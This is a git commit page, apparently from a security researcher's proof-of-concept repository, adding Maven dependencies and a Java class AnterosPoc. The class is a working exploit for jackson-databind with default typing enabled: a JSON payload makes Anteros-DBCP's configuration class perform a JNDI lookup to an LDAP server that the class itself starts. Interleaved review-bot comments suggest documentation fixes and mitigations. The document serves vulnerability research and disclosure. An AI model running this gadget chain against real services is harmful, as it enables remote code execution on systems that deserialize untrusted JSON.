
Commit 407396b

author
threedr3am
committed
feat:jackson新gadget(anteros-dbcp)
1 parent a5839c5 commit 407396b


2 files changed

+68
-0
lines changed


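--- a/jackson/pom.xml
+++ b/jackson/pom.xml
@@ -79,6 +79,25 @@
 <artifactId>javaee-api</artifactId>
 <version>6.0</version>
 </dependency>
+
+<!-- https://mvnrepository.com/artifact/com.codahale.metrics/metrics-healthchecks -->
+<dependency>
+<groupId>com.codahale.metrics</groupId>
+<artifactId>metrics-healthchecks</artifactId>
+<version>3.0.2</version>
+</dependency>
+<!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-Core -->
+<dependency>
+<groupId>br.com.anteros</groupId>
+<artifactId>Anteros-Core</artifactId>
+<version>1.2.1</version>
+</dependency>
+<!-- https://mvnrepository.com/artifact/br.com.anteros/Anteros-DBCP -->
+<dependency>
+<groupId>br.com.anteros</groupId>
+<artifactId>Anteros-DBCP</artifactId>
+<version>1.0.1</version>
+</dependency>
 </dependencies>
 
 </project>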
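Review bot: The three added dependencies carry only Maven Repository links as comments, so nothing in the POM says why a metrics library and a connection-pool library are on this module's classpath. A short comment above the first one, such as `<!-- gadget-chain dependencies for AnterosPoc (jackson-databind default-typing demo); keep out of any deployable artifact -->`, would tell a maintainer, or whoever triages dependency-scanner findings, that these versions are presumably pinned on purpose for the demonstration. The enclosing `<dependencies>` element starts outside the hunk.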
Lines changed: 49 additions & 0 deletions
@@ -0,0 +1,49 @@
1+
package com.threedr3am.bug.jackson;
2+
3+
import com.fasterxml.jackson.databind.ObjectMapper;
4+
import com.threedr3am.bug.common.server.LdapServer;
5+
import java.io.IOException;
6+
7+
/**
8+
*
9+
* jackson-databind <= 2.10.2 and <= 2.9.10.3 RCE,需要开启DefaultType (reported by threedr3am to the authorities)
10+
*
11+
* <dependency>
12+
* <groupId>com.codahale.metrics</groupId>
13+
* <artifactId>metrics-healthchecks</artifactId>
14+
* <version>3.0.2</version>
15+
* </dependency>
16+
*
17+
* <dependency>
18+
* <groupId>br.com.anteros</groupId>
19+
* <artifactId>Anteros-Core</artifactId>
20+
* <version>1.2.1</version>
21+
* </dependency>
22+
*
23+
* <dependency>
24+
* <groupId>br.com.anteros</groupId>
25+
* <artifactId>Anteros-DBCP</artifactId>
26+
* <version>1.0.1</version>
27+
* </dependency>
28+
*
29+
* @author threedr3am
30+
*/
31+
public class AnterosPoc {
32+
33+
static {
34+
//rmi server示例
35+
// RmiServer.run();
36+
37+
//ldap server示例
38+
LdapServer.run();
39+
}
40+
41+
public static void main(String[] args) throws IOException {
42+
ObjectMapper mapper = new ObjectMapper();
43+
mapper.enableDefaultTyping();
44+
45+
String json = "[\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap://localhost:43658/Calc\"}]";
46+
mapper.readValue(json, Object.class);
47+
}
48+
49+
}
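Review bot: `LdapServer.run();` sits in the static initializer, so merely loading `AnterosPoc` (an IDE index, a test scanner, reflection) starts the helper server as a side effect; making it the first statement of `main` confines it to an explicit run. `LdapServer` is not visible on this page, so how it binds is an assumption to confirm. The class Javadoc embeds raw `<dependency>` tags, which Javadoc treats as unknown HTML and does not render; wrapping that block in `<pre>{@code ... }</pre>` keeps it readable. For readers on the defensive side the Javadoc should also state the precondition and the remedy in English, for example `Requires enableDefaultTyping(); mitigate by upgrading jackson-databind beyond the versions named above, or by using activateDefaultTyping(...) with a restrictive PolymorphicTypeValidator.`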
